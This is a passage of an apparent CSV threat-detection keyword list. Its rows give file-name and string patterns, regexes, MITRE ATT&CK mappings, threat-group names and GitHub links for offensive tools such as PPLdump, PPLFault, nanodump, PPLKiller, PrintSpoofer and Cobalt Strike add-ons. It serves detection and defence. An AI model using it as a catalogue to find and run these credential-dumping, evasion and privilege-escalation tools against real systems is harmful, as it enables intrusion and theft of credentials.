TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ppl_medic_dll.*",".{0,1000}ppl_medic_dll\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*PPLBlade.dmp*",".{0,1000}PPLBlade\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that supports obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*PPLBlade.exe*",".{0,1000}PPLBlade\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that supports obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*PPLBlade-main.*",".{0,1000}PPLBlade\-main\..{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that supports obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 
- TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*ppldump *",".{0,1000}ppldump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*PPLdump*",".{0,1000}PPLdump.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLdump.exe*",".{0,1000}PPLdump\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland 
exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*ppldump.py*",".{0,1000}ppldump\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*PPLDump_BOF.*",".{0,1000}PPLDump_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ppldump_embedded*",".{0,1000}ppldump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract 
credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*PPLdump64.exe*",".{0,1000}PPLdump64\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLdumpDll*",".{0,1000}PPLdumpDll.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLFault.*",".{0,1000}PPLFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*pplfault.cna*",".{0,1000}pplfault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combines it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFault.exe*",".{0,1000}PPLFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code 
Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLFaultDumpBOF*",".{0,1000}PPLFaultDumpBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFault-Localhost-SMB.ps1*",".{0,1000}PPLFault\-Localhost\-SMB\.ps1.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFaultPayload.dll*",".{0,1000}PPLFaultPayload\.dll.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - 
TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFaultTemp*",".{0,1000}PPLFaultTemp.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLKiller.exe*",".{0,1000}PPLKiller\.exe.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLKiller.sln*",".{0,1000}PPLKiller\.sln.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLKiller.vcxproj*",".{0,1000}PPLKiller\.vcxproj.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLKiller-master*",".{0,1000}PPLKiller\-master.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PPLmedicDll.def*",".{0,1000}PPLmedicDll\.def.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*PPLmedicDll.dll*",".{0,1000}PPLmedicDll\.dll.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","1","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*PppEWCIgXbsepIwnuRIHtQLC*",".{0,1000}PppEWCIgXbsepIwnuRIHtQLC.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","767","224","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*ppypykatz.py*",".{0,1000}ppypykatz\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*praetorian.antihacker*",".{0,1000}praetorian\.antihacker.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" 
"*praetorian.com/blog/relaying-to-adfs-attacks/*",".{0,1000}praetorian\.com\/blog\/relaying\-to\-adfs\-attacks\/.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*praetorian-inc/ADFSRelay*",".{0,1000}praetorian\-inc\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. 
This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*praetorian-inc/gato*",".{0,1000}praetorian\-inc\/gato.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*praetorian-inc/noseyparker*",".{0,1000}praetorian\-inc\/noseyparker.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*praetorian-inc/PortBender*",".{0,1000}praetorian\-inc\/PortBender.{0,1000}","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","638","105","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*Prasadhak.ps1*",".{0,1000}Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*pre2k auth * --dc-ip *",".{0,1000}pre2k\sauth\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*prepare_ppl_command_line*",".{0,1000}prepare_ppl_command_line.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*prepareResponseForHiddenAPICall*",".{0,1000}prepareResponseForHiddenAPICall.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*Prepouce/CoercedPotato*",".{0,1000}Prepouce\/CoercedPotato.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*Press a key to end PoC?*",".{0,1000}Press\sa\skey\sto\send\sPoC\?.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","#contentstrings","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*PrimusC2-main.zip*",".{0,1000}PrimusC2\-main\.zip.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*print_shtinkering_crash_location*",".{0,1000}print_shtinkering_crash_location.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*printerbug.py *:*@* *",".{0,1000}printerbug\.py\s.{0,1000}\:.{0,1000}\@.{0,1000}\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*PrinterNotifyPotato *",".{0,1000}PrinterNotifyPotato\s.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*PrinterNotifyPotato.*",".{0,1000}PrinterNotifyPotato\..{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","340","45","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*Println(""DO WESTERN!!""*",".{0,1000}Println\(\""DO\sWESTERN!!\"".{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*PrintNightmare.*",".{0,1000}PrintNightmare\..{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*printnightmare_check*",".{0,1000}printnightmare_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*PrintNotifyPotato.exe*",".{0,1000}PrintNotifyPotato\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*PrintNotifyPotato-NET2.exe*",".{0,1000}PrintNotifyPotato\-NET2\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*printspoofer -Command*",".{0,1000}printspoofer\s\-Command.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PrintSpoofer-*",".{0,1000}PrintSpoofer\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 